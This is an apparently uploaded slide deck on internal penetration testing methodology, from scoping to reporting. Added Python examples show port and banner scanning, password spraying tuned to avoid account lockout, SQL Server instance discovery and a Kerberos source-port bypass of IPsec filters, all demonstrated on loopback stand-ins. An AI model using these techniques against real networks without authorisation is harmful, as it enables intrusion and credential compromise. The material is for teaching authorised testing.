Internal Penetration Testing

This document outlines the process and tools used for internal penetration testing. It discusses defining the scope and goals, appropriate limits, and the differences between internal and external testing. The main steps are footprinting, host identification, service identification and enumeration, host enumeration, network mapping, high severity vulnerability scanning, and vulnerability mapping/exploitation. High severity findings such as weak NetBIOS and SQL Server passwords and web vulnerabilities are the priorities. Findings should be reported clearly, categorized as tactical or strategic, with remediation recommendations.

Uploaded by

Saroja Roja

Internal Penetration Testing

Defining scope and goals
Tools of the test
Presentation of findings

Defining Scope and Goals

Define specific goals for the assessment. What defines success?
  Identify vs. exploit? (is proving a vulnerability exists enough, or must it be exploited?)
  Should systems be tagged? (leave a marker file on each compromised host as proof of access)
  Are screenshots enough as evidence?
Create timelines
Active assessment (the test generates traffic and logons; tell the people who will see the alerts)

Limits
Out of scope for the tester is not out of scope for an attacker. The following are often excluded from an engagement, yet a real intruder would use every one of them; agree in writing which are permitted:
Reading email in an attempt to gain passwords
Attacking workstations to gain network credentials
Attacking administrative workstations to gain admin access
Searching .txt and .doc files on workstations
Searching .txt and .doc files on production systems
Sniffing traffic
Keystroke loggers
Intentional denial of service

Internal vs. External

What is the difference?
Fewer or no access controls between the tester and the targets (no perimeter firewall in the way)
Test and development systems are reachable, and are usually less hardened than production
Trust relationships between hosts and domains can be abused to move from one system to the next

Tools of the Test

1. Footprint
2. Host Identification
3. Service Identification
4. Service Enumeration
5. Host Enumeration
6. Network Map
7. HSV Scans
8. Vulnerability Mapping/Exploitation

1. Footprint
Goal: identify IP ranges and domains

net view /domain lists the domains visible from the test host

Identify IP ranges from:
SNMP
DNS
ICMP

2. Host Identification
Identify hosts with:
TCP probes
ICMP probes

Identify domain members using the NET command:
net view /domain:<domain>

Tools: Foundstone scanners (e.g. fscan) and net view

3. Service Identification
Identify listening ports:
TCP
UDP

Tool:
fscan -i <ip>

4. Service Enumeration
Identify what is running on the listening ports

Tools:
Nmap and Nessus

5. Host Enumeration
Use all the previous information to make an accurate guess at the OS and version, starting from the Nessus reports

6. Network Map
Should be created to identify hosts, services and access paths.
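Steps 2 to 6 in code, as an added example that is not a tool from the original slides: TCP host identification, port and service identification, banner-based enumeration, and a per-host network map. The target is a constructed loopback listener so the script runs offline; PORT_NAMES and the banner heuristics are assumptions standing in for the Nmap/Nessus fingerprint databases.

```python
"""Steps 2 to 6 against one target: TCP host identification, port and service
identification, banner-based enumeration, and a per-host network map.
Added example, not a tool from the original slides; the target is a
constructed loopback listener."""
import socket
import threading
from typing import Dict, Iterable, List, Optional

# Assumed port-to-service table; a real run uses Nmap's service database.
PORT_NAMES = {80: "http", 139: "netbios-ssn", 445: "microsoft-ds (SMB)",
              1433: "ms-sql-s", 3389: "ms-wbt-server (RDP)"}


def tcp_connect(host: str, port: int, timeout: float = 0.5) -> Optional[bytes]:
    """Return the banner (possibly b"") if the port accepts a connection,
    None if it is closed or filtered. A completed connect() is what fscan
    and nmap report as an open port."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256)   # SSH, SMTP and FTP speak first
            except socket.timeout:
                return b""           # open, but silent until we send something
    except OSError:                   # refused, unreachable, or timed out
        return None


def identify_services(host: str, ports: Iterable[int]) -> Dict[int, bytes]:
    """Steps 3 and 4: every open port and whatever banner it volunteered."""
    found: Dict[int, bytes] = {}
    for port in ports:
        banner = tcp_connect(host, port)
        if banner is not None:
            found[port] = banner
    return found


def guess_service(port: int, banner: bytes) -> str:
    """Step 5 in miniature: trust the banner first, the port number second."""
    text = banner.decode("ascii", errors="replace").strip()
    if text.startswith("SSH-"):
        return "ssh " + text
    if text.startswith("220 "):
        return "smtp/ftp " + text
    return PORT_NAMES.get(port, "unknown")


def network_map(hosts: Iterable[str], ports: List[int]) -> Dict[str, Dict[int, str]]:
    """Steps 2 and 6: a host with any open TCP port counts as alive (ICMP is
    often blocked on workstations); the result is host -> {port: service}."""
    result: Dict[str, Dict[int, str]] = {}
    for host in hosts:
        services = identify_services(host, ports)
        if services:
            result[host] = {p: guess_service(p, b) for p, b in services.items()}
    return result


def start_fake_service(banner: bytes) -> int:
    """Constructed stand-in for a real host: a loopback listener that greets
    each client with `banner` and hangs up. Returns the port the OS assigned."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            conn.sendall(banner)
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    ssh = start_fake_service(b"SSH-2.0-OpenSSH_8.9\r\n")
    silent = start_fake_service(b"")
    print(network_map(["127.0.0.1"], [ssh, silent]))
```

On a real subnet the hosts list comes from the footprinting step and the port list from fscan; the silent listener shows why a connect scan alone is not enumeration, since an open port with no banner still needs a protocol-specific probe to name it.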

7. HSV Scans
High Severity Vulnerability (HSV) scans should be performed to identify systems with high severity vulnerabilities:
NetBIOS weak passwords
SQL weak passwords
Web vulnerabilities

Cont.
NetBIOS weak passwords
manual guessing techniques
nbtenum (ntsleuth.0catch.com)
nat (NetBIOS Auditing Tool)

SQL weak passwords

Tools:
SQLMAP
SQLlhf
SQLdict
Sqlping2
osql
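The NetBIOS and SQL weak-password checks above share one hazard the tools leave to the operator: domain account lockout. The following harness, an added example that is not from the slides or any of the listed tools, spreads guesses across accounts and stops one failure short of the lockout threshold. The `try_login` callback is an assumption standing in for a real SMB or TDS logon, and FAKE_USERS is a constructed credential store, not real data.

```python
"""Lockout-aware password guessing for the NetBIOS/SMB and SQL Server weak
password checks. Added example, not code from the slides: `try_login` is
a callback where a real SMB or TDS logon attempt would go, and FAKE_USERS
is a constructed credential store standing in for the target."""
import time
from typing import Callable, Dict, Iterable, Tuple


def spray(accounts: Iterable[str], passwords: Iterable[str],
          try_login: Callable[[str, str], bool],
          lockout_threshold: int, delay: float = 0.0
          ) -> Tuple[Dict[str, str], Dict[str, int]]:
    """Guess password-first: each round tries one password against every
    account, so failures spread evenly instead of piling onto one user.
    Stop one failure short of the threshold, because the last allowed bad
    logon could coincide with the user's own typo and lock them out.
    Returns (credentials found, failed attempts per account)."""
    accounts = list(accounts)
    found: Dict[str, str] = {}
    failures = {a: 0 for a in accounts}
    budget = lockout_threshold - 1
    for password in passwords:
        for account in accounts:
            if account in found or failures[account] >= budget:
                continue                  # already solved, or out of safe attempts
            if try_login(account, password):
                found[account] = password
            else:
                failures[account] += 1
        if delay:
            time.sleep(delay)             # pace rounds against the lockout observation window
    return found, failures


# Constructed target: what the DC / SQL Server would accept. Not real data.
FAKE_USERS = {
    "administrator": "Summer2024!",
    "svc_sql": "sa",            # SQL Server 'sa' reused as a Windows password
    "jdoe": "Welcome1",
    "backup": "Password1",      # guessable, but beyond the 4-attempt budget below
}

COMMON_PASSWORDS = ["password", "Welcome1", "sa", "Summer2024!", "Password1", "company123"]


def fake_login(user: str, password: str) -> bool:
    """Stand-in for an SMB or TDS logon (assumption: the target only counts failures)."""
    return FAKE_USERS.get(user) == password


if __name__ == "__main__":
    creds, fails = spray(FAKE_USERS, COMMON_PASSWORDS, fake_login, lockout_threshold=5)
    print(creds, fails)
```

With a threshold of 5 the `backup` account is never cracked even though its password is on the list: that is the deliberate cost of not locking anyone out, and it belongs in the report as "not tested beyond N attempts" rather than "strong password". Pull the real threshold and observation window from the domain policy (net accounts) before the first guess.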

Remarks
SQL Server can run on alternate ports; named instances in particular get a dynamic TCP port, which is why sqlping asks the SQL Server Browser service on UDP 1434 rather than assuming TCP 1433.
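The UDP 1434 exchange behind that remark, as an added example (not code from the slides or from sqlping): the client sends the one-byte CLNT_UCAST_EX request and the Browser service answers with a length-prefixed list of instances, each carrying its TCP port. The Browser reply below is a constructed sample in the documented format, served by a loopback stand-in, not a capture from a real server.

```python
"""SQL Server discovery via the SQL Server Resolution Protocol (SSRP, UDP
1434), which is how sqlping finds instances that were moved off TCP 1433.
Added example, not code from the slides; the Browser-service reply is a
constructed sample in the documented format, not a capture."""
import socket
import threading
from typing import Dict, List

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x02"   # "list every instance on this host"
SVR_RESP = 0x05           # first byte of the Browser service's reply


def parse_response(datagram: bytes) -> List[Dict[str, str]]:
    """SVR_RESP layout: 0x05, uint16 little-endian length, then ASCII
    'key;value;key;value;...;;' with ';;' closing each instance."""
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    length = int.from_bytes(datagram[1:3], "little")
    body = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2:
            continue                      # trailing empty chunk after the last ';;'
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def discover(host: str, port: int = SSRP_PORT, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send CLNT_UCAST_EX and parse whatever comes back (empty list on silence)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, port))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return []                     # no Browser service, or UDP 1434 filtered
    return parse_response(data)


def tcp_ports(instances: List[Dict[str, str]]) -> Dict[str, int]:
    """Instance name -> TCP port; named instances usually sit on a dynamic port."""
    return {i.get("InstanceName", "?"): int(i["tcp"]) for i in instances if "tcp" in i}


# Constructed reply for a host with a default instance on 1433 and a named
# instance on a dynamic port (the case the 'alternate ports' remark is about).
SAMPLE_BODY = (
    "ServerName;DBSRV01;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;10.50.1600.1;tcp;1433;;"
    "ServerName;DBSRV01;InstanceName;SQLEXPRESS;IsClustered;No;"
    "Version;11.0.2100.60;tcp;52401;np;\\\\DBSRV01\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)


def start_fake_browser(body_text: str) -> int:
    """Constructed stand-in for the SQL Server Browser service on loopback.
    Returns the UDP port it is listening on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    port = srv.getsockname()[1]
    body = body_text.encode("ascii")
    reply = bytes([SVR_RESP]) + len(body).to_bytes(2, "little") + body

    def serve():
        data, peer = srv.recvfrom(1024)
        if data[:1] == CLNT_UCAST_EX:
            srv.sendto(reply, peer)

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    browser = start_fake_browser(SAMPLE_BODY)
    print(tcp_ports(discover("127.0.0.1", browser)))
```

Feed the ports returned by `tcp_ports` into the service identification step; a TCP scan that stops at 1433 will miss the SQLEXPRESS instance on 52401 entirely. Silence on UDP 1434 does not prove there is no SQL Server, only that the Browser service is off or filtered.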

Web vulnerabilities
Tools:
stealth
whisker
typhon

8. Vulnerability Mapping/Exploitation
Source port attacks
If you use IPsec, do not forget the NoDefaultExempt key. By default the Windows 2000/XP IPsec driver exempts Kerberos, RSVP and IKE traffic from its filters, so a client that sets its source port to 88 (Kerberos) passes straight through. Setting the value to 1 removes the Kerberos and RSVP exemptions:
HKLM\SYSTEM\CurrentControlSet\Services\IPSEC\NoDefaultExempt | DWORD = 1

Web attacks
NetBIOS attacks
SQL attacks
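The source-port attack itself, as an added example that is not from the slides: the only thing the attacker does differently is bind the local end of the socket to port 88 before connecting. The target here is a constructed loopback listener that reports the source port it saw, so the effect can be checked offline; binding a port below 1024 needs root or Administrator, which is why the demo falls back to a high port.

```python
"""Source-port attack from step 8, run against a constructed loopback target.
Added example, not code from the slides. Windows 2000/XP IPsec filters
exempted Kerberos traffic by default, so a client that binds its source
port to 88 reached ports the filters were meant to block; NoDefaultExempt = 1
closes that hole. Binding a port below 1024 needs admin/root, so the demo
falls back to a high port."""
import socket
import threading

KERBEROS_PORT = 88


def connect_from(host: str, port: int, src_port: int, timeout: float = 2.0) -> bytes:
    """Connect to host:port with a caller-chosen local source port and return
    the first thing the service sends. Raises PermissionError when src_port is
    privileged and the process is not, OSError when it is already in use."""
    s = socket.socket()
    s.settimeout(timeout)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)   # survive TIME_WAIT from a previous run
    s.bind(("", src_port))                                     # the whole attack is this line
    try:
        s.connect((host, port))
        return s.recv(64)
    finally:
        s.close()


def start_peer_port_reporter() -> int:
    """Constructed target: a loopback listener that replies with the client's
    source port as text, so the caller can confirm the bind took effect."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, peer = srv.accept()
            conn.sendall(str(peer[1]).encode())
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def source_port_is_honoured(host: str, port: int, src_port: int) -> bool:
    """True when the target saw the connection arrive from src_port."""
    return connect_from(host, port, src_port) == str(src_port).encode()


if __name__ == "__main__":
    target = start_peer_port_reporter()
    try:
        print("kerberos source port:", source_port_is_honoured("127.0.0.1", target, KERBEROS_PORT))
    except PermissionError:
        print("port 88 needs root/Administrator; high-port demo:",
              source_port_is_honoured("127.0.0.1", target, 40088))
```

Against a real host the check is the same call with a service port the IPsec policy is supposed to block: if it connects from source port 88 but not from an ordinary ephemeral port, the default exemptions are still in place and the registry value above is the finding. Firewalls that match only on source port have the same weakness, which is what fscan's source-port option exercised.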

9. Presentation of findings
Report should be clear and concise
Include screenshots
Use action items for remediation
Categorize findings:
TACTICAL (fix this host, service or password now)
STRATEGIC (architecture, process and policy changes that stop the class of finding)

Presentation of findings
Strengthening Microsoft Networks:
strong domain architectures
rigid user management
hardened applications
principle of least privilege
security baselines for systems
defence in depth
network segmentation
3rd party audit

THANK YOU
